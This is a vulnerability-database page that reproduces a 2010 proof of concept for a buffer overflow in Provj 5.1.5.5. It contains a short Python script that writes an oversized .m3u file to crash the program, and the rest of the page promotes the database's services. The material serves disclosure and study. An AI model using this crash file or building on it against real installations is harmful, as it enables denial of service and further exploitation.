Lucene search
+L

Provj 5.1.5.5 Buffer Overflow

🗓️ 30 Nov 2010 00:00:00Reported by 0v3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Provj 5.1.5.5 Buffer Overflow Vulnerability PoC, Exploit for Windows XP SP

Code
`# Exploit Title: Provj 5.1.5.5 (m3u) Buffer Overflow Vulnerability PoC  
# Date: 11/30/2010  
# Author: 0v3r  
# Software Link: http://www.clubdjpro.com/files/provj5.exe  
# Version: 5.1.5.5  
# Tested on: Windows XP SP3 EN  
# CVE: N/A  
  
  
#!/usr/bin/python  
  
buff = "\x41" * 5000  
  
try:  
f = open("exploit.m3u",'w')  
f.write(buff)  
f.close()  
print "[-] File created!\n"  
except:  
print "[-] Error occured!\n"  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Nov 2010 00:00Current
1.5Low risk
Vulners AI Score1.5
22